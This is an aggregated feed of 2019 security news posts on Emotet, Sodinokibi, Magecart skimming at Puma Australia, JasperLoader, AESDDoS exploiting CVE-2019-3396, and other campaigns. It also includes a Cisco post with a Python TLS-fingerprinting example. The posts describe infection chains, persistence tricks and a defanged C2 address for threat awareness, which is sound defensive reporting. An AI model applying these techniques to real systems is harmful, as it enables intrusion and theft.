The post Victims of ZQ Ransomware can decrypt their files for free appeared first on Security Affairs.

Kodi Hardware Add-on Users, Mostly At Risk With Malware

Kodi used to be a software-only solution that gave users a seamless way to share media within a certain geographic area, but the people behind the software went ahead and supplied their patrons with a hardware version. This lessened the need for technical expertise in setting up a separate PC for media consumption and sharing in the home or neighborhood. Making Kodi just like any other home appliance, however, brings with it the problem of malware infection.

More and more security and privacy organizations distrust the makers of the Kodi software, let alone its appliance counterpart. The Digital Citizens Alliance (DCA) has nothing but bad comments about Kodi’s hardware, especially its alleged role as the centerpiece of piracy in the neighborhood. According to their study, the Kodi Box, a gray-market $100 machine, is a dream piracy device for the 270 Americans they surveyed, but at the same time it is at risk of malware infection.

The Kodi software itself is open source and is not designed for piracy; it is simply a tool for sharing content. But most users were not keen on checking whether the content shared and used through the software is legal or not.

“By plugging the device into a home network, [users] are enabling hackers to bypass the security designed to protect their system. If apps on the box or that are later downloaded have malware, the user has helped the hacker past network security. (We) uncovered a clever scheme that enabled criminals to pose as well-known streaming sites, such as Netflix, to facilitate illegal access to a legitimate subscription of an actual Netflix subscriber,” explained a Digital Citizens Alliance representative.

DCA has partnered with an IT security firm, GroupSense, to monitor black market sales. The latter found evidence of a hacker group discussing amongst themselves the feasibility of tapping into Kodi in order to propagate their malware, expand their botnet and improve their chances of successfully planting cryptojacking malware on victims’ computers while they share content.

Kodi is open-source software and can be extended beyond the features its authors provide by default. Some versions of Kodi were deliberately rebuilt to include capabilities to attempt a DoS attack against a target chosen by the hacking groups. XBMC, the developers of Kodi, strongly deny the accusation that their creation is the culprit in helping expand malware infections. XBMC also highlighted the fact that they do not support third-party platform extensions of the original Kodi. Such add-on products are creations of their respective vendors, and XBMC was not in any way involved in the development of those add-ons, hardware or software.

“If you are selling a box on your website designed to trick users into thinking broken add-ons come from us and work perfectly, so you can make a buck, we’re going to do everything we can to stop you,” said an XBMC representative.

The bottom line: the choice of using Kodi’s unofficial extensions and hardware add-ons is the responsibility of the user. If they purchase those unsupported products, XBMC cannot be blamed for any issue arising from the use of those products.


The post Kodi Hardware Add-on Users, Mostly At Risk With Malware appeared first on .

Emotet Trojan Now Uses IoT And Router Devices To Evade Detection

The Emotet malware has been frequently covered here since July last year. It is not uncommon for a cybersecurity-centered website to discuss most if not all of its infection instances, since it is a very complex banking trojan that continues to receive enhancements from its authors. This time around, we cover Emotet’s newest campaign, which began two months ago and targets vulnerable IoT devices and routers in order to grow the botnet further. By using vulnerable routers and IoT devices, Emotet can camouflage its fleet of zombified desktops, laptops and servers.

With the addition of new members to the botnet, the heavy hitters (laptops, desktops and servers) can now send data through a series of IoT and router members of the botnet before it reaches the actual command and control servers. This way, discovering the C&C servers is harder for security researchers, as the path of the data transfer is obscured by thousands of intermediate nodes.

“Recently, an analysis of Emotet traffic has revealed that new samples use a different POST-infection traffic than previous versions. It is also attempting to use compromised connected devices as proxy command and control (C&C) servers that redirect to the real Emotet C&Cs. These changes may seem trivial at first, but the added complexity in command and control traffic is an attempt by Emotet authors to evade detection. These discoveries also show that the malware is being used to compromise and collect vulnerable connected devices, which could become resources for other malicious purposes,” explained a TrendMicro blog.

The newly updated Emotet malware does not only depend on spam emails to spread, as it always has: certain copies of Emotet that TrendMicro got hold of showed indications that it is using another trojan in order to propagate. Named Powload, AKA Trojan.W97M.POWLOAD, when executed it takes advantage of a Windows PowerShell command to download the rest of Emotet onto the system. Also, the spam email campaign carrying Emotet was made more convincing, as the malicious attachment is a password-protected zip archive. The user is instructed to open the file with the password provided in the body of the email. This method helps the attachment look legitimate, as many legitimate emails with clean attachments use the same technique when sending files to multiple users.

“Newer traffic shows something different. Actors stayed away from using the Cookie header and changed the HTTP request method to POST. The data is still encrypted with an RSA key and AES, and encoded in Base 64. However, instead of being stored in the Cookie value, it was put in the body of the HTTP POST message. This change adds another layer of complexity to help the malware evade detection or delay further investigation if it is detected,” added TrendMicro.

The more command and control servers the Emotet group brings online, the harder it is to identify the perpetrators of the malware. TrendMicro detected instances where they were led to C&C-like behavior, but it turned out to be just an infected router; in another case it was a Digital Video Recorder that happened to be online and infected by Emotet as well. This creates a situation where Emotet itself artificially creates multiple dummy nodes in order to bypass detection.


The post Emotet Trojan Now Uses IoT And Router Devices To Evade Detection appeared first on .

Crooks exploit Oracle WebLogic flaw to deliver Sodinokibi Ransomware

Threat actors are exploiting a recently patched critical Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware to organizations.

Threat actors are delivering a new piece of malware, tracked as Sodinokibi, by exploiting a recently patched Oracle WebLogic Server vulnerability.

Oracle WebLogic Server is a Java EE application server developed by Oracle Corporation; it is used by numerous applications and enterprise web portals based on Java technology. The flaw initially received the identifier CNVD-C-2019-48814.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.

On April 26, Oracle addressed the flaw with the release of an out-of-band update.

The threat was detected and analyzed by several firms (e.g. South Korea’s EST Security and Cisco’s Talos), independent researchers and intelligence groups.

“Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10,” reads the analysis published by Cisco Talos. “Attackers have been making use of this exploit in the wild since at least April 17.”

Sodinokibi ransomware

Crooks used PowerShell commands to download and execute malicious payloads; they demanded a ransom ranging from $1,500 worth of Bitcoin up to $2,500. The ransom doubles if the victims do not pay within a specified number of days.

Talos started seeing the first stages of the Sodinokibi attacks — the attackers first looked for exploitable WebLogic servers —

Since April 25, one day before Oracle released security patches, the experts have observed Sodinokibi ransomware infections.

Talos also noted that threat actors were exploiting the flaw to deliver the popular Gandcrab ransomware.

“We find it strange the attackers would choose to distribute additional, different ransomware on the same target. Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab,” Talos researchers continue.

Experts discovered that CVE-2019-2725 has also been exploited to deliver cryptocurrency miners and other types of malware. Researchers believe it has likely also been exploited in targeted attacks.

“Due to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725,” concludes Talos.

Pierluigi Paganini

(SecurityAffairs – sodinokibiransomware, Weblogic)

The post Crooks exploit Oracle WebLogic flaw to deliver Sodinokibi Ransomware appeared first on Security Affairs.

BabyShark Malware Targeting Nuclear and Cryptocurrency Industries

In 2018, Palo Alto Networks’ Unit 42 researchers announced that they had identified a spear-phishing campaign targeting U.S. national security think tanks and academic institutions. Research indicates that the “threat actor might have interests in gathering intelligence related to not only North Korea but possibly wider in the Northeast Asia region.”

According to Unit 42, the spear phishing emails contain malware called BabyShark that “shares infrastructure with playbooks associated with North Korean campaigns.”

However, as reported by Cyware, the activities of the malware have expanded and it is being used for other malicious purposes.

What’s the matter – According to researchers, the operators of the BabyShark malware are now targeting cryptocurrency industries with the intent of making a profit.

The recent activities of the malware observed from March 2019 to April 2019 include:

  • Espionage on nuclear security and the Korean peninsula’s national security issues;
  • Financial gain by infiltrating cryptocurrency industries

In addition, the malware has been found using two other malware families as secondary payloads. The malware used as secondary payloads, KimJongRAT and PCRat, are referred to as ‘Cowboys’.

How is it done – The attackers are using spear phishing or watering hole attacks to target users. In the case of spear phishing, a malicious link is sent within an email, whereas in the watering hole attack the victims are redirected to a malicious go Microsoft link.

Once the BabyShark malware is launched, it unleashes its multi-stage infection chain, performing checks between each stage. This ensures that only targeted hosts advance to the next stage before it finally beacons back to the attackers.

“This is done by maintaining a list of blacklisted IP addresses and computer names for those who have made suspicious access attempts, such as access with invalid parameters, to the server as a possible technique meant to make analysis harder. The IP addresses and computer names in the blacklist are written in base64 encoded format at [BASE_URI]/blackip.txt,” researchers explained in a blog post.

About the Cowboys – The secondary payloads are delivered as:

  • EXE loader
  • DLL loader
  • One encoded payload

“The functionality of the EXE and DLL loaders is the same: the only difference is the file type. These loaders are later run upon receiving an execution command: ‘execute’ to invoke the EXE type loader or ‘power com’ to launch the DLL type loader. We theorize the reason for having two different type loaders is to have redundancy for loading the payload in case of anti-virus software’s disruption. Either loader will load the custom encoded secondary payload, the Cowboy, in memory, decode it, and execute it,” the researchers said.

The information that KimJongRAT steals from victim machines includes email credentials from Microsoft Outlook and Mozilla Thunderbird. The malware also pilfers the system’s OS version along with login credentials for Google, Facebook and Yahoo.

PCRat is a variant of the Gh0stRAT malware family. It is a remote administration trojan whose source code is openly available on the internet.

The bottom line – The malware’s evolving activities show that its author has made efforts to expand operations to target the cryptocurrency industries. The threat actors are also leveraging other commodity and custom-developed tools in this campaign.


The post BabyShark Malware Targeting Nuclear and Cryptocurrency Industries appeared first on .

Puma Australia Hit With Credit Card Hack Malware

Sophisticated malware was planted by hackers on Puma Australia’s website with the intention of stealing customers’ credit card information at checkout, a security researcher found.

Suspicious code tucked away on Puma Australia’s page contained a script that logged people’s credit card numbers, names and addresses as they typed them into the website. The code sent victims’ data to a server registered in Ukraine, said Willem de Groot, Sanguine Security forensic analyst.

Puma did not immediately respond to a request for comment after the security researcher notified them about this attack.

The skimming campaign, known as Magecart, is made up of multiple hacking groups, and Puma is the latest in a long line of businesses hit with credit card skimming malware. It is a massive hacking operation targeting online shops.

This kind of malware goes after popular websites with vulnerabilities. Earlier victims include the Atlanta Hawks, British Airways and Newegg, among many other businesses targeted by Magecart over the past few years.

“The single largest problem with Magecart is that consumers have absolutely no way to know that they got skimmed until it’s too late and that merchants lack the tools to properly deal with this,” de Groot said.

Puma is one of the top sportswear brands in the world, with sales reaching $4 billion in 2018, according to financial reports. In the last year, Puma saw major growth in the Asia/Pacific region, where its Australian team operates.

Puma’s popularity as a worldwide brand makes it a prime target for Magecart attackers. De Groot said he found the malware through a detection tool he developed, which finds Magecart code embedded on hundreds of stores a day.

The security researcher de Groot said the skimmer found on Puma Australia’s website was one of the most sophisticated he had seen yet.

This skimmer was able to camouflage itself by using innocuous-looking identifiers such as “optEmbed” and “selectDuration.” Typically, skimmers have to be tailored to the specific payment system they target, but de Groot found that the skimmer on Puma Australia’s website was a jack of all trades.

He said he has found 77 other online stores with this new kind of Magecart skimmer. It supports payment systems across the world, indicating a collaborative effort between hackers internationally.

“It has adapters for over 50 payment gateways, which means that the owner can deploy it quickly to newly hacked stores,” de Groot said in a message. “It clearly took a massive effort to build support for all these payment systems.”


The post Puma Australia Hit With Credit Card Hack Malware appeared first on .

ElectrumDoSMiner botnet reached 152,000 hosts

Researchers at Malwarebytes are monitoring the evolution of the ElectrumDoSMiner DDoS botnet that reached 152,000 infected hosts.

MalwareBytes researchers are closely monitoring attacks against users of the popular Electrum Bitcoin wallet, in particular, the evolution of the Electrum DDoS botnet.

In mid-April, experts at MalwareBytes published a report warning of cyber attacks against users of the popular Electrum Bitcoin wallet. According to the experts, crooks already netted over 771 Bitcoins, an amount equivalent to approximately $4 million USD at current exchange rates.

Since that analysis, cybercriminals have stolen further funds, reaching USD $4.6 million, but the most concerning aspect of the story is that the botnet they use continues to grow. On April 24, the botnet was composed of fewer than 100,000 bots, but the next day the number peaked at 152,000.

“Since our last blog, the amount of stolen funds has increased to USD $4.6 million, and the botnet that is flooding the Electrum infrastructure is rapidly growing.” reads the analysis published by MalwareBytes. “Case in point, on April 24, the number of infected machines in the botnet was just below 100,000 and the next day it reached its highest at 152,000, according to this online tracker. Since then, it has gone up and down and plateaued at around the 100,000 mark.”

The experts had already monitored two malware campaigns, leveraging the RIG exploit kit and Smoke Loader respectively, to deliver the ElectrumDoSMiner.

MalwareBytes also detected a previously undocumented loader, tracked as Trojan.BeamWinHTTP, that crooks used to deliver the ElectrumDoSMiner (transactionservices.exe).

The experts believe that there are many more infection vectors beyond the loaders they have discovered so far.

Most of the ElectrumDoSMiner infections were observed in the Asia Pacific region (APAC), Brazil and Peru.


“The number of victims that are part of this botnet is constantly changing. We believe as some machines get cleaned up, new ones are getting infected and joining the others to perform DoS attacks.” continues the report. “Malwarebytes detects and removes ElectrumDoSMiner infections on more than 2,000 endpoints daily.”

Further technical details, including Indicators of Compromise (IoCs), are reported in the analysis published by MalwareBytes.

Pierluigi Paganini

(SecurityAffairs – ElectrumDoSMiner, botnet)

The post ElectrumDoSMiner botnet reached 152,000 hosts appeared first on Security Affairs.

Companies face regulatory fines and cybersecurity threats, still fail to protect sensitive data

22% of a company’s folders are accessible, on average, to every employee, according to the new report from the Varonis Data Lab, which analyzed more than 54 billion files. The report shines a light on security issues that put organizations at risk from data breaches, insider threats and crippling malware attacks. Key findings from the 2019 Global Data Risk Report include: Out-of-control permissions expose sensitive files and folders to every employee: 53% of companies had … More

The post Companies face regulatory fines and cybersecurity threats, still fail to protect sensitive data appeared first on Help Net Security.

Ransomware In Cleveland Hopkins Airport, Is There A Cover-up?

The world is still suffering from ransomware, even after the growth of its less noisy cousin, cryptojacking malware. Cleveland Hopkins International Airport is the latest high-profile installation to suffer a ransomware attack. The mayor’s office, headed by Mayor Frank Jackson, called it an “isolated technical issue” as it tried to calm the public while showing everyone that the airport remains operational. However, the systems actually affected by the malware are the airport’s digital records storage, email and payroll systems, while the only visible indication that something is wrong at the airport is the flight display screens showing arriving and departing flights.

“On April 21, the malware was discovered on several Cleveland Hopkins International Airport computing systems. As a result, the Flight Information Display, Baggage Information Display, and email systems were impacted. These systems were not accessed by any unauthorized personnel (hacked) and there were no ransom demands,” said the Mayor’s office.

At the time of this writing, the FBI is on the case to determine the threat actors responsible for the ransomware attack. The Mayor’s office described it as follows: “It was called by the city and it is cooperating in the assessment of the problems.” Mayor Jackson’s reasoning is not acceptable to the knowledgeable sectors of the public, who realize that something was off with how the airport operated. Airplanes take off and touch down as normal, hence the infection incident has no direct impact on passengers.

“The FBI was contacted by city and airport officials, a collaborative assessment is being conducted to determine the cause of the technical issues. Additional information is not available at this time and will be released when appropriate,” explained Vicki Anderson, Cleveland Federal Bureau of Investigation.

The FBI assures the public that the baggage and flight information systems will be restored at the soonest possible time, including the email systems used by the airport’s employees.

“You usually wouldn’t bring in the FBI if you just had a hard drive that failed. If a system was off-line because of a power outage or a bad power supply, you’d call the vendor of that system and you’d bring it in and you’d be back up and running shortly. The fact that they have made a public statement that the FBI is involved and that the FBI does have an internet crime division, it makes us speculate there was some type of electronic or computer fraud that was taking place,” said Paul Sems of Trusted Sec.

The post Ransomware In Cleveland Hopkins Airport, Is There A Cover-up? appeared first on .

New Emotet variant uses connected devices as proxy C2 servers

Researchers at Trend Micro have uncovered a malware campaign distributing a new Emotet Trojan variant that compromises devices and uses them as Proxy C2 servers.

Trend Micro discovered a new variant of the Emotet Trojan that is able to infect devices and use them as proxy command-and-control servers. The new variant also employs random URI directory paths to evade network-based detection rules.

“Recently, an analysis of Emotet traffic has revealed that new samples use a different POST-infection traffic than previous versions.” reads the analysis published by Trend Micro. “It is also attempting to use compromised connected devices as proxy command and control (C&C) servers that redirect to the real Emotet C&Cs. These changes may seem trivial at first, but the added complexity in command and control traffic is an attempt by Emotet authors to evade detection.”

The experts also noticed that threat actors behind the latest Emotet campaign are actively attempting to compromise IoT devices, including routers, IP cameras, webcams, and recruit them in a first layer of the C2 infrastructure.

The compromised devices could be used by threat actors for other malicious purposes.

Emotet is delivered via spam campaigns; one of the attacks monitored in early April leveraged the Powload trojan downloader to drop the threat. The spam emails carry a malicious ZIP file that can be opened with the 4-digit password included in the body of the email. The ZIP archive contains variants of Powload that use PowerShell to download an executable, the final Emotet payload.


Since March 15, experts have monitored Emotet samples using new post-infection traffic and discovered that they also use randomly generated URI directory paths in their POST requests to evade network-based detection.

The new Emotet version sends the stolen information in the HTTP POST message body instead of the Cookie header. Like previous versions, it encrypts the data with an RSA key and AES, and encodes it in Base64.


“The change in POST-infection traffic and the use of these connected devices show that Emotet is still a constantly evolving and resilient threat.” concludes Trend Micro.

“The malware authors are fine-tuning evasion techniques and trying to adapt to security solutions. If left unchecked and undetected, this threat may lead to a substantial loss of money and data for businesses.”

Pierluigi Paganini

(SecurityAffairs – cybercrime, malware)

The post New Emotet variant uses connected devices as proxy C2 servers appeared first on Security Affairs.

TLS Fingerprinting in the Real World

To protect your data, you must understand the traffic on your network.  This task has become even more challenging with widespread use of the Transport Layer Security (TLS) protocol, which inhibits traditional network security monitoring techniques.  The good news is that TLS fingerprinting can help you understand your traffic without interfering with any of the security benefits TLS brings to applications and complements current solutions like Encrypted Traffic Analytics [9].   To help our customers better understand the benefits of the approach, and to help drive the development and adoption of defensive uses of traffic analysis, the Advanced Security Research team of Cisco’s Security and Trust Organization has published a large set of fingerprints [1] with the support of the Cisco Technology Fund.

Transport Layer Security (TLS) fingerprinting is a technique that associates an application and/or TLS library with parameters extracted from a TLS ClientHello by using a database of curated fingerprints, and it can be used to identify malware and vulnerable applications and for general network visibility. These techniques gained attention in 2009 with mod_sslhaf [2], in 2012 with SSL fingerprinting for p0f [3], in 2015 with FingerprinTLS [4], and most recently with JA3 [5]. We have been using this approach at Cisco since 2016 [6]. The attention given to TLS fingerprinting has been warranted because it is a proven method that provides network administrators with valuable intelligence to protect their networks. And while more of the TLS handshake goes dark with TLS 1.3, client fingerprinting still provides a reliable way to identify the TLS client. In fact, TLS 1.3 has increased the parameter space of TLS fingerprinting due to the added data features in the ClientHello. While there are currently only five cipher suites defined for TLS 1.3, most TLS clients released in the foreseeable future will be backwards compatible with TLS 1.2 and will therefore offer many “legacy” cipher suites. In addition to the five TLS 1.3-specific cipher suites, there are several new extensions, such as supported versions, that allow us to differentiate between clients that supported earlier draft implementations of TLS 1.3.

Why is our approach different?

But here’s the catch: the visibility gained by TLS fingerprinting is only as good as the underlying fingerprint database, and until now, generating this database was a manual process that was slow to update and was not reflective of real-world TLS usage. Building on work we first publicly released in January 2016 [6], we solved this problem by creating a continuous process that fuses network telemetry with endpoint telemetry to build fingerprint databases automatically. This allows us to leverage data from managed endpoints to generate TLS fingerprints that give us visibility into the (much larger) set of unmanaged endpoints and do so in a way that can quickly incorporate information about newly released applications. By automatically fusing process and OS data gathered by Cisco® AnyConnect® Network Visibility Module (NVM) [7] with network data gathered by Joy [1], our system generates fingerprint databases that are representative of how a diverse set of real-world applications and operating systems use network protocols such as TLS. We also apply this process to data generated from Cisco Threat Grid [8], an automated malware analysis sandbox, to ensure that our system captures the most recent trends in malware. With ground truth from multiple sources like real-world networks and malware sandboxes, we can more easily differentiate fingerprints that are uniquely associated with malware versus fingerprints that need additional context for a confident conviction.

Our internal database has process and operating system attribution information for more than 4,000 TLS fingerprints (and counting) obtained from real-world networks (NVM) and a malware analysis sandbox (Threat Grid). The database also has observational information such as counts, destinations, and dates observed for more than 12,000 TLS fingerprints from a set of enterprise networks. We have open sourced a subset of this database that, at more than 1,900 fingerprints (and counting), is the largest and most informative fingerprint database released to the open-source community. This database contains information about benign processes only; we are not able to publish fingerprints for malware at this time.

Given the records generated from the data fusion process, we report all processes and operating systems that use a TLS fingerprint, providing a count of the number of times we observed each process or operating system using the TLS fingerprint in real-world network traffic. This schema gives a more realistic picture of TLS fingerprint usage (in other words, many processes can map to a single fingerprint with some more likely than others).

Another advantage of our database is that it provides as much relevant contextual data per fingerprint as possible. The primary key into our database is a string that describes the TLS parameters that you would observe on the wire, which allows a system generating these keys to provide valuable information even in the case of no database matches. We associate each TLS parameter in the ClientHello with the RFC that first defined that parameter and use this information to report maximum and minimum implementation dates. These dates provide useful context on the age of the cryptographic parameters in the ClientHello and are not dependent on a database match.
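The fingerprint string and the RFC-based implementation dates described above, as an added Python example that is not the Cisco article's or the Joy project's code: it parses a ClientHello, drops GREASE values, emits a JA3-style fingerprint string, and reports the oldest and newest RFC years among the parameters it recognises. The sample ClientHello and the small RFC-year table are constructed for the example, and the fingerprint layout is this example's own rather than Joy's format.

```python
"""Build a JA3-style fingerprint string from a TLS ClientHello and report the
RFC-year range of its parameters. Added example, not Cisco's Joy code; the
sample ClientHello and the RFC-year excerpt are constructed for it."""
import struct

# RFC 8701 GREASE values (0x0a0a ... 0xfafa) are inserted at random positions by
# clients and must be dropped for a fingerprint to be stable.
GREASE = {(v << 8) | v for v in range(0x0A, 0x100, 0x10)}
# Year of the RFC that first defined each parameter (excerpt; a real database
# covers every suite and extension). Suites: 0x000a RFC 2246, 0x002f RFC 3268,
# 0xc02f RFC 5289, 0x1301 RFC 8446.
CIPHER_RFC_YEAR = {0x000A: 1999, 0x002F: 2002, 0xC02F: 2008, 0x1301: 2018}
# Extensions: server_name (RFC 3546), supported_groups (RFC 4492),
# signature_algorithms (RFC 5246), supported_versions (RFC 8446).
EXT_RFC_YEAR = {0: 2003, 10: 2006, 13: 2008, 43: 2018}


def _u16_list(data):
    """Decode a run of big-endian uint16 values (a trailing odd byte is ignored)."""
    n = len(data) // 2
    return list(struct.unpack("!%dH" % n, data[:2 * n]))


def parse_client_hello(record):
    """Return version, cipher suites and the ordered (type, data) extensions of a
    ClientHello record; raise ValueError for anything that is not one."""
    if len(record) < 9 or record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a TLS handshake record carrying a ClientHello")
    hs_len = int.from_bytes(record[6:9], "big")
    body = record[9:9 + hs_len]
    if len(body) != hs_len:
        raise ValueError("truncated ClientHello")
    version = struct.unpack_from("!H", body)[0]
    off = 2 + 32                                   # legacy_version, random
    off += 1 + body[off]                           # session id
    cs_len = struct.unpack_from("!H", body, off)[0]
    ciphers = _u16_list(body[off + 2:off + 2 + cs_len])
    off += 2 + cs_len
    off += 1 + body[off]                           # compression methods
    extensions = []
    if off + 2 <= len(body):                       # extensions block is optional
        end = off + 2 + struct.unpack_from("!H", body, off)[0]
        off += 2
        while off + 4 <= end:
            etype, elen = struct.unpack_from("!HH", body, off)
            extensions.append((etype, body[off + 4:off + 4 + elen]))
            off += 4 + elen
    return {"version": version, "ciphers": ciphers, "extensions": extensions}


def fingerprint(record):
    """Fingerprint layout (this example's own): version, cipher suites, extension
    types, supported groups, supported versions; hex, '-'-joined, GREASE removed."""
    ch = parse_client_hello(record)
    groups, versions = [], []
    for etype, data in ch["extensions"]:
        if etype == 10:    # supported_groups: uint16 length, then uint16 list
            groups = _u16_list(data[2:2 + struct.unpack_from("!H", data)[0]])
        elif etype == 43:  # supported_versions: uint8 length, then uint16 list
            versions = _u16_list(data[1:1 + data[0]])
    ext_types = [t for t, _ in ch["extensions"]]
    hexlist = lambda xs: "-".join("%04x" % x for x in xs if x not in GREASE)
    fields = [ch["ciphers"], ext_types, groups, versions]
    return ",".join(["%04x" % ch["version"]] + [hexlist(f) for f in fields])


def implementation_years(record):
    """Return (oldest, newest) RFC year among recognised parameters, or None. The
    newest year is the earliest the client could have been written, which is useful
    context even when the fingerprint has no database match."""
    ch = parse_client_hello(record)
    years = [CIPHER_RFC_YEAR[c] for c in ch["ciphers"] if c in CIPHER_RFC_YEAR]
    years += [EXT_RFC_YEAR[t] for t, _ in ch["extensions"] if t in EXT_RFC_YEAR]
    return (min(years), max(years)) if years else None


def build_client_hello(version, ciphers, extensions):
    """Assemble a ClientHello record; used here only to construct sample input."""
    ext_blob = b"".join(struct.pack("!HH", t, len(d)) + d for t, d in extensions)
    body = struct.pack("!H", version) + bytes(32) + b"\x00"   # random, empty session id
    body += struct.pack("!H", 2 * len(ciphers)) + struct.pack("!%dH" % len(ciphers), *ciphers)
    body += b"\x01\x00"                                       # null compression only
    body += struct.pack("!H", len(ext_blob)) + ext_blob
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


# Constructed sample: a TLS 1.2/1.3 client that offers one GREASE cipher suite,
# one GREASE group and one GREASE extension alongside real values.
SAMPLE = build_client_hello(
    0x0303,
    [0x2A2A, 0x1301, 0xC02F, 0x002F, 0x000A],
    [
        (0, b"\x00\x0e\x00\x00\x0bexample.com"),                      # server_name
        (10, struct.pack("!5H", 8, 0x3A3A, 0x001D, 0x0017, 0x0018)),  # x25519, P-256, P-384
        (13, struct.pack("!3H", 4, 0x0403, 0x0804)),                  # signature_algorithms
        (43, b"\x04\x03\x04\x03\x03"),                                # TLS 1.3, TLS 1.2
        (0x4A4A, b""),
    ],
)
```

Because the string is built from the wire parameters alone, `fingerprint()` and `implementation_years()` give usable output for a client that is absent from the database, which is the property the article describes.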


We are continuing to develop applications on top of the fingerprint database we are developing, and any input is most welcome. To facilitate collaboration, we have open sourced a subset of the internal TLS fingerprint database along with several python tools as a part of the Joy project [1]. Our open-source contributions include:

  • A fingerprint database that is updated weekly
  • A Joy feature to generate fingerprint strings for TLS flows
  • A set of python programs to identify TLS fingerprints in a packet capture or from a live network interface and generate new TLS fingerprints that can be contributed to the open-source community
  • A web-based user interface to visualize the results of TLS fingerprinting

Researchers develop new technique to identify malware in embedded systems

A technique for detecting types of malware that use a system’s architecture to thwart traditional security measures has been developed by researchers from North Carolina State University and the University of Texas at Austin. The new detection approach works by tracking power fluctuations in embedded systems. “Embedded systems are basically any computer that doesn’t have a physical keyboard – from smartphones to Internet of Things devices,” says Aydin Aysu, co-author of a paper on the … More

The post Researchers develop new technique to identify malware in embedded systems appeared first on Help Net Security.

Signed Malspam campaigns hit Europeans with Multi-Stage JasperLoader

Experts observed several malspam campaigns using signed emails to deliver the GootKit banking Trojan (aka talalpek or Xswkit).

Threat actors leverage a multi-stage malware loader tracked as JasperLoader in the malspam campaigns over the past few months.

The JasperLoader was observed while distributing malware to targets from Central Europe, most of them in Italy and Germany.

The Gootkit banking Trojan was previously distributed by DanaBot, the Neutrino exploit kit, and Emotet.

“Specifically, we’re tracking a loader known as “JasperLoader,” which has been increasingly active over the past few months and is currently being distributed via malicious spam campaigns primarily targeting central European countries with a particular focus on Germany and Italy.” reads the analysis published by Cisco Talos. “JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult.”

The JasperLoader loader uses a multi-stage infection process that implements several obfuscation techniques to avoid detection. According to Cisco Talos experts, the JasperLoader loader was designed with resiliency and flexibility in mind.

The malspam campaigns detected by Cisco Talos that hit European countries use weaponized attachments containing either a Visual Basic script (VBS) or a DOCM document with VBA macros.


Talos experts also noticed spam messages containing malicious JS downloaders.

The latest malspam campaigns observed by Talos use message signing to confirm the authenticity of the sender.

“Talos has identified several malicious campaigns making use of this type of message signing as a way to lend credibility to their messages and maximize the likelihood that potential victims will open the malicious attachments.” continues the analysis of the researchers.

The campaigns that targeted Italian users leverage legitimate certified email services such as Posta Elettronica Certificata (PEC).

“The choice to abuse certified email services such as PEC demonstrates that attackers are always looking for new ways to lend credibility to their social engineering attacks.” continues Cisco Talos.

“In this case, abusing a legitimate email service allowed them to deliver their malicious emails in a way that would maximize the likelihood that a potential victim would open the attachments and infect themselves with JasperLoader. “

The JasperLoader malware loader is used by threat actors to check the targets’ geolocation and determine whether a machine is in one of the countries targeted in the malspam campaign (i.e. Russia, Ukraine, Belarus, or the People’s Republic of China).

Experts observed that the malware gains persistence by adding an LNK shortcut to itself in the Startup folder, so that the malware is launched every time the system reboots.

The JasperLoader is used by threat actors to update the loader, to run PowerShell scripts, and, of course, to deliver the final Gootkit malware payload.

Further technical details, such as Indicators of compromise (IOCs), are included in the analysis published by Talos.

Pierluigi Paganini

(SecurityAffairs – malspam campaigns, JasperLoader)

The post Signed Malspam campaigns hit Europeans with Multi-Stage JasperLoader appeared first on Security Affairs.

AESDDoS bot exploits CVE-2019-3396 flaw to hit Atlassian Confluence Server

A new variant of the AESDDoS bot is exploiting a recent vulnerability in the Atlassian collaborative software Confluence.

Security experts at Trend Micro have spotted a new variant of AESDDoS botnet that is exploiting a recently discovered vulnerability in the Atlassian collaborative software Confluence.

The flaw exploited in the attacks, tracked as CVE-2019-3396, is a server-side template injection vulnerability that resides in the Widget Connector macro in Confluence Server.

Threat actors leverage the vulnerability to install denial-of-service (DDoS) malware and cryptocurrency miners, and to remotely execute code.

“In our analysis, we saw that an attacker was able to exploit CVE-2019-3396 to infect machines with the AESDDoS botnet malware.” reads the analysis published by Trend Micro. “A shell command was remotely executed to download and execute a malicious shell script (Trojan.SH.LODEX.J), which in turn downloaded another shell script (Trojan.SH.DOGOLOAD.J) that finally installed the AESDDoS botnet malware on the affected system.”

The AESDDoS bot involved in the recent attacks has the ability to launch several types of DDoS attacks, including SYN, LSYN, UDP, UDPS, and TCP flood.

The malware also connects to 23[.]224[.]59[.]34:48080 to send and receive remote shell commands from the attacker.

Once the malware has infected a system, it can gather system information, including model ID and CPU description, speed, family, model, and type.

The AESDDoS bot uses the AES algorithm to encrypt gathered data and data received from the C2 server.

Trend Micro researchers also discovered that the latest variant of the AESDDoS bot can modify files such as /etc/rc.local and /etc/rc.d/rc.local as an autostart technique, appending the command {malware path}/{malware file name} reboot to them.

Atlassian has already addressed the vulnerability in the Confluence software with the release of version 6.15.1.

“Since the successful exploitation of CVE-2019-3396 in Atlassian Confluence Server can put resources at risk, enterprises should be able to identify vulnerabilities, make use of the latest threat intelligence against malware or exploits, and detect modifications to the application’s design and the underlying infrastructure that hosts it,” Trend Micro concludes.

Pierluigi Paganini

(SecurityAffairs – AESDDoS bot, DDoS)

The post AESDDoS bot exploits CVE-2019-3396 flaw to hit Atlassian Confluence Server appeared first on Security Affairs.

Beapy Cryptojacking campaign leverages EternalBlue exploit to spread

Security experts uncovered a new cryptojacking campaign tracked as Beapy that leverages the NSA’s DoublePulsar backdoor and the EternalBlue exploit.

Security experts at Symantec have uncovered a new cryptojacking campaign tracked as Beapy that leverages the NSA’s DoublePulsar backdoor and the EternalBlue exploit to spread a cryptocurrency malware on enterprise networks in Asia.

“Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks.” reads the analysis published by Symantec.

“Beapy (W32.Beapy) is a file-based coinminer that uses email as an initial infection vector.”

